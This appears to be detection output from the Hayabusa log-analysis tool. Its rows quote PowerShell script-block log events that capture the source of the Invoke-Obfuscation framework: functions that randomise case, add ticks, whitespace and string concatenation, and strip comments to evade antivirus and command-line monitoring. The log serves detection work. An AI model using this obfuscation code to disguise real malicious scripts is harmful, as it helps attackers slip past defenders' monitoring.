ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. 
If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. 
While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. 
Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. 
Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. 
.EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. 
# If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. 
Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. 
$InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. 
.EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. 
Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. 
Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. 
$LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line 